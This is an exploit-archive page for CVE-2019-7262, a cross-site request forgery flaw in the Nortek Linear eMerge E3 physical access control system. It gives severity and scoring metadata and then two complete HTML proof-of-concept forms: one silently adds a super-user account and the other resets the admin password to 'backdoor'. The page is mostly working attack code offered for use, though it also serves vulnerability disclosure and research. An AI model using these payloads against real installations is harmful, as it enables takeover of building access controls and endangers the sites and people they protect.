Advertisement






Nortek Linear eMerge E3 Access Control Cross Site Request Forgery

CVE Category Price Severity
CVE-2019-7262 CWE-352 $5,000 High
Author Risk Exploitation Type Date
Alejandro Parodi High Remote 2019-11-14
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019110091

Below is a copy:

Nortek Linear eMerge E3 Access Control Cross Site Request Forgery
Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery

CVE: CVE-2019-7262
Advisory: https://applied-risk.com/resources/ar-2019-005
Discovered by Gjoko 'LiquidWorm' Krstic

<!-- CSRF Add Super User -->
<html>
  <body>
   <form action="http://192.168.1.2/?c=webuser&m=insert" method="POST">
     <input type="hidden" name="No" value="" />
     <input type="hidden" name="ID" value="hax0r" />
     <input type="hidden" name="Password" value="hax1n" />
     <input type="hidden" name="Name" value="CSRF" />
     <input type="hidden" name="UserRole" value="1" />
     <input type="hidden" name="Language" value="en" />
     <input type="hidden" name="DefaultPage" value="sitemap" />
     <input type="hidden" name="DefaultFloorNo" value="1" />
     <input type="hidden" name="DefaultFloorState" value="1" />
     <input type="hidden" name="AutoDisconnectTime" value="24" />
     <input type="submit" value="Add Super User" />
   </form>
  </body>
</html>

<!-- CSRF Change Admin Password -->
<html>
  <body>
   <form action="http://192.168.1.2/?c=webuser&m=update" method="POST">
     <input type="hidden" name="No" value="1" />
     <input type="hidden" name="ID" value="admin" />
     <input type="hidden" name="Password" value="backdoor" />
     <input type="hidden" name="Name" value="admin" />
     <input type="hidden" name="UserRole" value="1" />
     <input type="hidden" name="Language" value="en" />
     <input type="hidden" name="DefaultPage" value="sitemap" />
     <input type="hidden" name="DefaultFloorNo" value="1" />
     <input type="hidden" name="DefaultFloorState" value="1" />
     <input type="hidden" name="AutoDisconnectTime" value="24" />
     <input type="submit" value="Change Admin Password" />
   </form>
  </body>
</html>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.